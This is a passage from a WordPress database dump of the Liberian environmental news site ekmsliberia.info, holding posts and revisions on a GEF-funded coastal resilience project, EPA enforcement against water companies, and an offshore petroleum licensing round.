vulnerable coastal residents from sea-level rise and supports our global vision to end hunger and poverty by 2030,” said Hon. Randall Dobayou, Executive Director a.i, Environmental Protection Agency.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>An estimated 64 percent of Liberians live below the poverty line, with 1.3 million living in extreme poverty. Food insecurity affects four out of 10 people, and chronic malnutrition is high. The Ebola Virus and COVID-19 pandemic have put even more Liberians at risk.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The economy, though recovering, is still unable to generate sufficient employment, especially for young people. More than half of Liberia’s 4 million people live within 40 miles of the coast, putting extensive pressure on coastal ecosystems for food, land, mineral extraction, and other resources. This has resulted in habitat loss and degradation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The project works toward transformational change by moving away from a \'business-as-usual\' model to an integrated approach that combines nature-based interventions, hard infrastructure,&nbsp;gender-responsive approaches, capacity, policy, engagement with the financial services sector, knowledge and information and observational management systems,” said UNDP Resident Representative Pa Lamin Beyai.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In supporting climate resilient livelihoods, gender equality, decent work and economic growth, and responsible consumption and production as outlined in the SDGs, the project supports business development and training programmes for 70,000 beneficiaries, with targeted approaches for women and youth. It also targets 30,000 beneficiaries who will benefit from integrated farming systems, fisheries and compressed stabilized \'earth blocks\' and their value chains.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The project enhances coastal resilience to storms,&nbsp;coastal erosion and flooding risks while supporting a range of ecosystem service benefits that improve livelihood security and overall climate resilience. These supports will benefit other coastal counties around the country in sea and river defence risk management as well as support for climate adaptation livelihood opportunities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Notes to editors</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li><a href=\"https://www.gcfprojects-undp.org/tp/project/6470\" target=\"_blank\" rel=\"noreferrer noopener\">UNDP Project Portal</a></li><li><a href=\"https://www.lr.undp.org/\" target=\"_blank\" rel=\"noreferrer noopener\">UNDP Liberia</a></li><li><a href=\"https://www.thegef.org/country/liberia\" target=\"_blank\" rel=\"noreferrer noopener\">GEF Liberia</a></li><li><a href=\"https://www4.unfccc.int/sites/ndcstaging/PublishedDocuments/Liberia%20First/INDC%20Final%20Submission%20Sept%2030%202015%20Liberia.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">Liberia NDC</a></li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>About UNDP</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>UNDP</strong>&nbsp;partners with people at all levels of society to help build nations that can withstand crisis, and drive and sustain the kind of growth that improves the quality of life for everyone. On the ground in nearly 170 countries and territories, we offer global perspective and local insight to help empower lives and build resilient nations.&nbsp;<a href=\"https://eur03.safelinks.protection.outlook.com/?url=https%3A%2F%2Furldefense.proofpoint.com%2Fv2%2Furl%3Fu%3Dhttp-3A__www.undp.org%26d%3DDwMFAw%26c%3DZ96x8jGkxccf5DH9xuHxeg%26r%3D0vwbEGEH_5HjcQQIeIAo6fyXVMaW32BTJA-6TMOutQU%26m%3DcqdlG21FOcNQjf_N23KjrcLqEO28SUFl-yjNFYr6Q-I%26s%3DiipEpMVKQ01v2DpjXW_3qLACxZa1WgZxSY5Ks8-X7H0%26e%3D&amp;data=02%7C01%7Cgregory.benchwick%40undp.org%7Ce33bd4405b7e4fd52e2408d7c45e6921%7Cb3e5db5e2944483799f57488ace54319%7C0%7C0%7C637193782071846976&amp;sdata=V4UFIvXme1XRp2jSyXvzHGpPsxchrh0uYmXlZsi%2BysM%3D&amp;reserved=0\" target=\"_blank\" rel=\"noreferrer noopener\">www.undp.org</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>About The GEF</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Global Environment Facility (GEF) was established on the eve of the 1992 Rio Earth Summit to help tackle our planet’s most pressing environmental problems.&nbsp;Since then, the GEF has provided close to&nbsp;<strong>$20.5 billion</strong>&nbsp;in grants and mobilized an additional&nbsp;<strong>$112 billion</strong>&nbsp;in co-financing for more than&nbsp;<strong>4,800 projects</strong>&nbsp;in&nbsp;<strong>170 countries</strong>. Through its Small Grants Programme, the GEF has provided support to nearly 24,000 civil society and community initiatives in 133 countries.</p>\n<!-- /wp:paragraph -->','EPA Gets US$ 8.9 M For Coastal Resilience Project','','publish','open','open','','epa-gets-us-8-9-m-for-coastal-resilience-project','','','2020-08-28 11:27:38','2020-08-28 11:27:38','',0,'https://ekmsliberia.info/?p=3063',197,'post','',0),(3064,38,'2020-06-04 13:12:09','2020-06-04 13:12:09','','DED','Global Environment Facility approves US$8.9 million in funding for new coastal resilience project in Liberia','inherit','open','closed','','ded-3','','','2020-06-04 13:13:10','2020-06-04 13:13:10','',3063,'https://ekmsliberia.info/wp-content/uploads/2020/06/DED.jpg',0,'attachment','image/jpeg',0),(3065,38,'2020-06-04 13:13:34','2020-06-04 13:13:34','<!-- wp:paragraph -->\n<p><strong>UNDP-supported project benefits 80,000 coastal residents in Sinoe County to build climate resilient livelihoods, and protect communities from sea level rise and other life-threatening climate change impacts</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>3 June 2020 –&nbsp;</strong>The Global Environment Facility (GEF) approved today US$8.9 million in new grant funding from the Least Developed Countries Fund (LDCF) for a&nbsp;<a href=\"https://www.adaptation-undp.org/projects/enhancing-resilience-vulnerable-coastal-communities-sinoe-county-liberia\">coastal resilience project&nbsp;</a>that will benefit 80,000 people in Liberia and rehabilitate 20,000 hectares of degraded coastal habitats.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Implemented by Liberia’s Environmental Protection Agency (EPA) and supported by the United Nations Development Programme (UNDP) the seven-year project will protect vulnerable coastal communities in Sinoe County from rising seas, degraded coastal habitats and other life-threatening climate change-related risks that threaten to undermine progress toward the Sustainable Development Goals (SDGs) and targets outlined in the Paris Agreement.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The project brings together co-financing and support from a number of sources. USAID will provide US$28 million in co-finance, the World Bank will provide US$15 million, and Conservation International will provide US$500,000 of in-kind contributions through their on-going work in Liberia and West Africa. It also builds on earlier and ongoing projects funded by the GEF and the Green Climate Fund.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Climate change is undermining our goals to build peace and prosperity for our people. Taken together with other actions, this innovative project protects vulnerable coastal residents from sea-level rise and supports our global vision to end hunger and poverty by 2030,” said Hon. Randall Dobayou, Executive Director a.i, Environmental Protection Agency.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>An estimated 64 percent of Liberians live below the poverty line, with 1.3 million living in extreme poverty. Food insecurity affects four out of 10 people, and chronic malnutrition is high. The Ebola Virus and COVID-19 pandemic have put even more Liberians at risk.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The economy, though recovering, is still unable to generate sufficient employment, especially for young people. More than half of Liberia’s 4 million people live within 40 miles of the coast, putting extensive pressure on coastal ecosystems for food, land, mineral extraction, and other resources. This has resulted in habitat loss and degradation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The project works toward transformational change by moving away from a \'business-as-usual\' model to an integrated approach that combines nature-based interventions, hard infrastructure,&nbsp;gender-responsive approaches, capacity, policy, engagement with the financial services sector, knowledge and information and observational management systems,” said UNDP Resident Representative Pa Lamin Beyai.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In supporting climate resilient livelihoods, gender equality, decent work and economic growth, and responsible consumption and production as outlined in the SDGs, the project supports business development and training programmes for 70,000 beneficiaries, with targeted approaches for women and youth. It also targets 30,000 beneficiaries who will benefit from integrated farming systems, fisheries and compressed stabilized \'earth blocks\' and their value chains.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The project enhances coastal resilience to storms,&nbsp;coastal erosion and flooding risks while supporting a range of ecosystem service benefits that improve livelihood security and overall climate resilience. These supports will benefit other coastal counties around the country in sea and river defence risk management as well as support for climate adaptation livelihood opportunities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Notes to editors</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li><a href=\"https://www.gcfprojects-undp.org/tp/project/6470\" target=\"_blank\" rel=\"noreferrer noopener\">UNDP Project Portal</a></li><li><a href=\"https://www.lr.undp.org/\" target=\"_blank\" rel=\"noreferrer noopener\">UNDP Liberia</a></li><li><a href=\"https://www.thegef.org/country/liberia\" target=\"_blank\" rel=\"noreferrer noopener\">GEF Liberia</a></li><li><a href=\"https://www4.unfccc.int/sites/ndcstaging/PublishedDocuments/Liberia%20First/INDC%20Final%20Submission%20Sept%2030%202015%20Liberia.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">Liberia NDC</a></li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>About UNDP</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>UNDP</strong>&nbsp;partners with people at all levels of society to help build nations that can withstand crisis, and drive and sustain the kind of growth that improves the quality of life for everyone. On the ground in nearly 170 countries and territories, we offer global perspective and local insight to help empower lives and build resilient nations.&nbsp;<a href=\"https://eur03.safelinks.protection.outlook.com/?url=https%3A%2F%2Furldefense.proofpoint.com%2Fv2%2Furl%3Fu%3Dhttp-3A__www.undp.org%26d%3DDwMFAw%26c%3DZ96x8jGkxccf5DH9xuHxeg%26r%3D0vwbEGEH_5HjcQQIeIAo6fyXVMaW32BTJA-6TMOutQU%26m%3DcqdlG21FOcNQjf_N23KjrcLqEO28SUFl-yjNFYr6Q-I%26s%3DiipEpMVKQ01v2DpjXW_3qLACxZa1WgZxSY5Ks8-X7H0%26e%3D&amp;data=02%7C01%7Cgregory.benchwick%40undp.org%7Ce33bd4405b7e4fd52e2408d7c45e6921%7Cb3e5db5e2944483799f57488ace54319%7C0%7C0%7C637193782071846976&amp;sdata=V4UFIvXme1XRp2jSyXvzHGpPsxchrh0uYmXlZsi%2BysM%3D&amp;reserved=0\" target=\"_blank\" rel=\"noreferrer noopener\">www.undp.org</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>About The GEF</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Global Environment Facility (GEF) was established on the eve of the 1992 Rio Earth Summit to help tackle our planet’s most pressing environmental problems.&nbsp;Since then, the GEF has provided close to&nbsp;<strong>$20.5 billion</strong>&nbsp;in grants and mobilized an additional&nbsp;<strong>$112 billion</strong>&nbsp;in co-financing for more than&nbsp;<strong>4,800 projects</strong>&nbsp;in&nbsp;<strong>170 countries</strong>. Through its Small Grants Programme, the GEF has provided support to nearly 24,000 civil society and community initiatives in 133 countries.</p>\n<!-- /wp:paragraph -->','EPA Gets US$ 8.9 M For Coastal Resilience Project','','inherit','closed','closed','','3063-revision-v1','','','2020-06-04 13:13:34','2020-06-04 13:13:34','',3063,'https://ekmsliberia.info/3063-revision-v1/',0,'revision','',0),(3066,38,'2020-06-09 22:59:39','2020-06-09 22:59:39','<!-- wp:paragraph -->\n<p>EPA Acting Executive Director, Randall M. Dobayou, II</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>The Environmental Protection Agency (EPA), in compliance with its duty and as part of campaign to arrest environmental degradation and abuse, has shut down two unknown companies that it says were illegally extracting groundwater in huge commercial quantities in Sinkor without permits.</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The companies have covertly extracted ground water for sale without environmental permits in violation of the Environmental Protection and Management Law (EPML) of Liberia,” EPA Acting Executive Director Randall M. Dobayou said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Dobayou, the companies were operating without names and documents that gave them permission.&nbsp; “You walk in their facilities, you will see no name for these companies,” said the EPA Acting Director.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said it is a breach of the Environmental Law for companies to operate an industrial project within a residential zone without an environment management plan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dobayou indicated that a project of such nature requires an environmental impact assessment study as provided for in Annex One of the EPML.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The companies, according to him, were also involved in unbearable noise via the unregulated movements of huge water tankers in residential areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He pointed out that a team of Environmental Inspectors were disallowed entry to access one of the facilities situated on 18th Street, Sinkor, on May 26, 2020 on ground that the manager of the facility was not available to grant any permission, noting that the refusal to grant access to Environmental Inspectors is a violation of Section 95 of the EPML.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Enforcing the closure order at one of the unregistered company on 18th&nbsp;Street, EPA Inspector General, R. Baiyezeneh Brown said “This halt order is therefore issued to your entity due to its gross violations and disregard to the EPA.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a three-count charge, Brown said the failure of the company to obtain an environmental permit prior to operation, obstruction of an environmental inspection and operation of an industrial project within a residential area without permit, and the unsustainable exploration of groundwater led to the closure of the company.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He asked the company’s management to proceed with the relevant environmental studies before operation; threatening that failure to adhere will lead to stringent actions consistent with the EPML.</p>\n<!-- /wp:paragraph -->','EPA Shuts Down ‘Illegal’ Water Companies','','publish','open','open','','epa-shuts-down-illegal-water-companies','','','2020-08-28 11:27:10','2020-08-28 11:27:10','',0,'https://ekmsliberia.info/?p=3066',196,'post','',0),(3067,38,'2020-06-09 22:58:38','2020-06-09 22:58:38','','DED PIC','EPA Acting Executive Director, Randall M. Dobayou, II','inherit','open','closed','','ded-pic','','','2020-06-09 22:59:17','2020-06-09 22:59:17','',3066,'https://ekmsliberia.info/wp-content/uploads/2020/06/DED-PIC.jpg',0,'attachment','image/jpeg',0),(3068,38,'2020-06-09 22:59:39','2020-06-09 22:59:39','<!-- wp:paragraph -->\n<p>EPA Acting Executive Director, Randall M. Dobayou, II</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>The Environmental Protection Agency (EPA), in compliance with its duty and as part of campaign to arrest environmental degradation and abuse, has shut down two unknown companies that it says were illegally extracting groundwater in huge commercial quantities in Sinkor without permits.</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The companies have covertly extracted ground water for sale without environmental permits in violation of the Environmental Protection and Management Law (EPML) of Liberia,” EPA Acting Executive Director Randall M. Dobayou said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Dobayou, the companies were operating without names and documents that gave them permission.&nbsp; “You walk in their facilities, you will see no name for these companies,” said the EPA Acting Director.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said it is a breach of the Environmental Law for companies to operate an industrial project within a residential zone without an environment management plan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dobayou indicated that a project of such nature requires an environmental impact assessment study as provided for in Annex One of the EPML.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The companies, according to him, were also involved in unbearable noise via the unregulated movements of huge water tankers in residential areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He pointed out that a team of Environmental Inspectors were disallowed entry to access one of the facilities situated on 18th Street, Sinkor, on May 26, 2020 on ground that the manager of the facility was not available to grant any permission, noting that the refusal to grant access to Environmental Inspectors is a violation of Section 95 of the EPML.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Enforcing the closure order at one of the unregistered company on 18th&nbsp;Street, EPA Inspector General, R. Baiyezeneh Brown said “This halt order is therefore issued to your entity due to its gross violations and disregard to the EPA.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a three-count charge, Brown said the failure of the company to obtain an environmental permit prior to operation, obstruction of an environmental inspection and operation of an industrial project within a residential area without permit, and the unsustainable exploration of groundwater led to the closure of the company.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He asked the company’s management to proceed with the relevant environmental studies before operation; threatening that failure to adhere will lead to stringent actions consistent with the EPML.</p>\n<!-- /wp:paragraph -->','EPA Shuts Down ‘Illegal’ Water Companies','','inherit','closed','closed','','3066-revision-v1','','','2020-06-09 22:59:39','2020-06-09 22:59:39','',3066,'https://ekmsliberia.info/3066-revision-v1/',0,'revision','',0),(3069,38,'2020-06-09 23:09:53','2020-06-09 23:09:53','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) has fined SSS Private Limited, a mineral water producer situated on Bushrod Island US$ 1,000 for breaching the Environmental Protection and Management Law of Liberia (EPML).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to EPA Acting Executive Director, Randall M. Dobayou the company been mandated to pay the money in government revenue at the Liberia Revenue Authority (LRA) and bring an official receipt to the agency’s office on 4<sup>th</sup>&nbsp;Street within 72 hours.&nbsp;&nbsp; &nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The fine was imposed following the outcome of a compliance monitoring and assessment conducted at SSS Private Limited’s facility on 21 May, EPA said in a statement issued on Tuesday, June 9, 2020.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prior to the decision, back to back conferences were held between authorities of the EPA and the water producer’s legal counsel and manager on 22 May and on 26 May 2020.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The operation of SSS Private Limited is in serious defiant and violation of the EPML,” Dobayou says its operation contravened several provisions of the EPML including Part III Section 6 which speak against operating an industrial establishment without a valid environmental permit.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Dobayou, the company’s failure to notified the EPA of changes relative to its project as enshrine in previous permit, which has expired contravened Section 26; Count 1 of the EPML.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that the company is also in violation of Section 55 of the EPML, which speaks about unauthorized importation and utilization of chemicals substances, Section 57 that talks about unregulated discharged of effluent into the environment and Section 67 that focuses on unsustainable discarding and littering of solid waste Section 95 that speaks about obstruction of environmental inspection.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“In lieu of the aforementioned non-conformances, SSS Private Limited has hereby been instructed to reengage the EPA in a process leading to the renewal of its environmental permit via the conduct and development of an environmental audit,” the EPA Acting Executive Director said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dobayou further asked the company to submit to the agency an application, in keeping with part III Section 6 relative to new undertaking at its facility and as well hire an EPA licensed waste service provider to sustainably handle the waste generated at the facility.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also mandated the company to undertake registration of all chemical products utilized as raw materials at its facility and seek guidance from the EPA relevant to the unauthorized discharge of effluent, couple with the institution of appropriate remediation measures or face stringent actions in keeping with the EPML and the Environmental Protection Agency Act.</p>\n<!-- /wp:paragraph -->','EPA Slaps Water Producer with US$ 1, 000 Fine','','publish','open','open','','epa-slaps-water-producer-with-us-1-000-fine','','','2020-08-28 11:26:42','2020-08-28 11:26:42','',0,'https://ekmsliberia.info/?p=3069',195,'post','',0),(3070,38,'2020-06-09 23:08:28','2020-06-09 23:08:28','','fines','EPA Acting Executive Director, Randall M. Dobayou','inherit','open','closed','','fines','','','2020-06-09 23:12:42','2020-06-09 23:12:42','',3069,'https://ekmsliberia.info/wp-content/uploads/2020/06/fines.jpg',0,'attachment','image/jpeg',0),(3071,38,'2020-06-09 23:12:57','2020-06-09 23:12:57','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) has fined SSS Private Limited, a mineral water producer situated on Bushrod Island US$ 1,000 for breaching the Environmental Protection and Management Law of Liberia (EPML).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to EPA Acting Executive Director, Randall M. Dobayou the company been mandated to pay the money in government revenue at the Liberia Revenue Authority (LRA) and bring an official receipt to the agency’s office on 4<sup>th</sup>&nbsp;Street within 72 hours.&nbsp;&nbsp; &nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The fine was imposed following the outcome of a compliance monitoring and assessment conducted at SSS Private Limited’s facility on 21 May, EPA said in a statement issued on Tuesday, June 9, 2020.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prior to the decision, back to back conferences were held between authorities of the EPA and the water producer’s legal counsel and manager on 22 May and on 26 May 2020.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The operation of SSS Private Limited is in serious defiant and violation of the EPML,” Dobayou says its operation contravened several provisions of the EPML including Part III Section 6 which speak against operating an industrial establishment without a valid environmental permit.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Dobayou, the company’s failure to notified the EPA of changes relative to its project as enshrine in previous permit, which has expired contravened Section 26; Count 1 of the EPML.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that the company is also in violation of Section 55 of the EPML, which speaks about unauthorized importation and utilization of chemicals substances, Section 57 that talks about unregulated discharged of effluent into the environment and Section 67 that focuses on unsustainable discarding and littering of solid waste Section 95 that speaks about obstruction of environmental inspection.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“In lieu of the aforementioned non-conformances, SSS Private Limited has hereby been instructed to reengage the EPA in a process leading to the renewal of its environmental permit via the conduct and development of an environmental audit,” the EPA Acting Executive Director said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dobayou further asked the company to submit to the agency an application, in keeping with part III Section 6 relative to new undertaking at its facility and as well hire an EPA licensed waste service provider to sustainably handle the waste generated at the facility.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also mandated the company to undertake registration of all chemical products utilized as raw materials at its facility and seek guidance from the EPA relevant to the unauthorized discharge of effluent, couple with the institution of appropriate remediation measures or face stringent actions in keeping with the EPML and the Environmental Protection Agency Act.</p>\n<!-- /wp:paragraph -->','EPA Slaps Water Producer with US$ 1, 000 Fine','','inherit','closed','closed','','3069-revision-v1','','','2020-06-09 23:12:57','2020-06-09 23:12:57','',3069,'https://ekmsliberia.info/3069-revision-v1/',0,'revision','',0),(3072,38,'2020-06-09 23:19:09','2020-06-09 23:19:09','<!-- wp:paragraph -->\n<p><strong>Monrovia, Liberia -&nbsp;&nbsp;</strong>As a means of ensuring that Liberian owned companies fully participate in the country’s ongoing offshore petroleum licensing round, the Liberia Petroleum Regulatory Authority (LPRA) on Friday, June 5, 2020, held a meeting with representatives of the Liberia Business Association (LIBA), Liberia Chambers of Commerce (LCC) and the Patriotic Entrepreneurs of Liberia (PATEL) to fully explain the processes and relevance of Liberian companies participating in the licensing round.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the meeting, the LPRA Director-General, Hon. Archie Donmo, stressed the significance of Liberian companies participating in the petroleum sector and pointed out, “I encourage everyone to take advantage of this tremendous opportunity which is potentially one of the means of promoting private sector growth in this county.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Participating institutions of the meeting lauded the LPRA for the initiative and expressed interest in working with the Authority in ensuring that Liberian companies are fully involved in the petroleum sector particularly during the 2020 offshore licensing round.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The decision to incorporate Liberian companies in the 2020 offshore licensing round is hinged on the President’s that “Liberians will not be spectators in their own economy.” It is further based on the indigenization mandate by the Government of Liberia as required in section 36(a) of the Amended Petroleum Law of Liberia which sets aside a mandatory 5% interest in all petroleum agreements to companies owned by natural persons of Liberian citizenship. To facilitate the enforcement of this provision, LPRA is conducting pre-qualification of Liberia companies and has issued a request for expression of interest.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The pre-qualification process which started March 17, 2020, was scheduled to end June 30, 2020. However, due to an appeal from the Liberian business community (LCC, LIBA, PATEL) and in consideration of the state of emergency as a result of the Covid-19, the Authority has extended the deadline for expression of interest to<strong>&nbsp;July 31, 2020</strong>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Meanwhile, &nbsp;a Q&amp;A zoom meeting is scheduled to be held on Friday, June 12 at which time Liberian companies interested in participating in the ongoing licensing round will be given the opportunity to ask the necessary questions relating to the bid round. LPRA encourages Liberian companies to take advantage of this opportunity and position themselves as partners in the quest for hydrocarbon resources.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Nine offshore blocks in the Harper Basin are being tendered during the licensing round. This region represents Liberia\'s most prospective geological regions and the only unexplored and undrilled region in West Africa Transformed Margin.&nbsp;The 2020 Liberia Offshore Licensing Round runs from April 10, 2020-February 28, 2021.&nbsp;</p>\n<!-- /wp:paragraph -->','Government intensifies campaign for Indigenization in the Oil and Gas Sector','','publish','open','open','','government-intensifies-campaign-for-indigenization-in-the-oil-and-gas-sector-meets-with-local-business-organizations-extends-pre-qualification-timeframe','','','2020-08-28 11:18:48','2020-08-28 11:18:48','',0,'https://ekmsliberia.info/?p=3072',194,'post','',0),(3073,38,'2020-06-09 23:18:31','2020-06-09 23:18:31','','oil company','LPRA','inherit','open','closed','','oil-company','','','2020-06-09 23:19:02','2020-06-09 23:19:02','',3072,'https://ekmsliberia.info/wp-content/uploads/2020/06/oil-company.jpg',0,'attachment','image/jpeg',0),(3074,38,'2020-06-09 23:19:09','2020-06-09 23:19:09','<!-- wp:paragraph -->\n<p><strong>Monrovia, Liberia -&nbsp;&nbsp;</strong>As a means of ensuring that Liberian owned companies fully participate in the country’s ongoing offshore petroleum licensing round, the Liberia Petroleum Regulatory Authority (LPRA) on Friday, June 5, 2020, held a meeting with representatives of the Liberia Business Association (LIBA), Liberia Chambers of Commerce (LCC) and the Patriotic Entrepreneurs of Liberia (PATEL) to fully explain the processes and relevance of Liberian companies participating in the licensing round.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the meeting, the LPRA Director-General, Hon. Archie Donmo, stressed the significance of Liberian companies participating in the petroleum sector and pointed out, “I encourage everyone to take advantage of this tremendous opportunity which is potentially one of the means of promoting private sector growth in this county.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Participating institutions of the meeting lauded the LPRA for the initiative and expressed interest in working with the Authority in ensuring that Liberian companies are fully involved in the petroleum sector particularly during the 2020 offshore licensing round.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The decision to incorporate Liberian companies in the 2020 offshore licensing round is hinged on the President’s that “Liberians will not be spectators in their own economy.” It is further based on the indigenization mandate by the Government of Liberia as required in section 36(a) of the Amended Petroleum Law of Liberia which sets aside a mandatory 5% interest in all petroleum agreements to companies owned by natural persons of Liberian citizenship. To facilitate the enforcement of this provision, LPRA is conducting pre-qualification of Liberia companies and has issued a request for expression of interest.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The pre-qualification process which started March 17, 2020, was scheduled to end June 30, 2020. However, due to an appeal from the Liberian business community (LCC, LIBA, PATEL) and in consideration of the state of emergency as a result of the Covid-19, the Authority has extended the deadline for expression of interest to<strong>&nbsp;July 31, 2020</strong>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Meanwhile, &nbsp;a Q&amp;A zoom meeting is scheduled to be held on Friday, June 12 at which time Liberian companies interested in participating in the ongoing licensing round will be given the opportunity to ask the necessary questions relating to the bid round. LPRA encourages Liberian companies to take advantage of this opportunity and position themselves as partners in the quest for hydrocarbon resources.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Nine offshore blocks in the Harper Basin are being tendered during the licensing round. This region represents Liberia\'s most prospective geological regions and the only unexplored and undrilled region in West Africa Transformed Margin.&nbsp;The 2020 Liberia Offshore Licensing Round runs from April 10, 2020-February 28, 2021.&nbsp;</p>\n<!-- /wp:paragraph -->','Government intensifies campaign for Indigenization in the Oil and Gas Sector: meets with local business organizations; extends pre-qualification timeframe','','inherit','closed','closed','','3072-revision-v1','','','2020-06-09 23:19:09','2020-06-09 23:19:09','',3072,'https://ekmsliberia.info/3072-revision-v1/',0,'revision','',0),(3077,38,'2020-06-15 13:30:26','2020-06-15 13:30:26','High Conservation Value Public Summary \nWonegizi Proposed Protected Area ','HCV 1-4 Report Wonegizi','FFI','inherit','open','closed','','hcv-1-4-report-wonegizi','','','2020-06-15 13:31:32','2020-06-15 13:31:32','',0,'https://ekmsliberia.info/wp-content/uploads/2020/06/HCV-1-4-Report-Wonegizi.pdf',0,'attachment','application/pdf',0),(3078,38,'2020-06-15 13:45:12','2020-06-15 13:45:12','High Conservation Value Public Summary \nWonegizi Proposed Protected Area ','HCV 1-4 Report Wonegizi','FFI','inherit','open','closed','','hcv-1-4-report-wonegizi-2','','','2020-06-15 13:46:06','2020-06-15 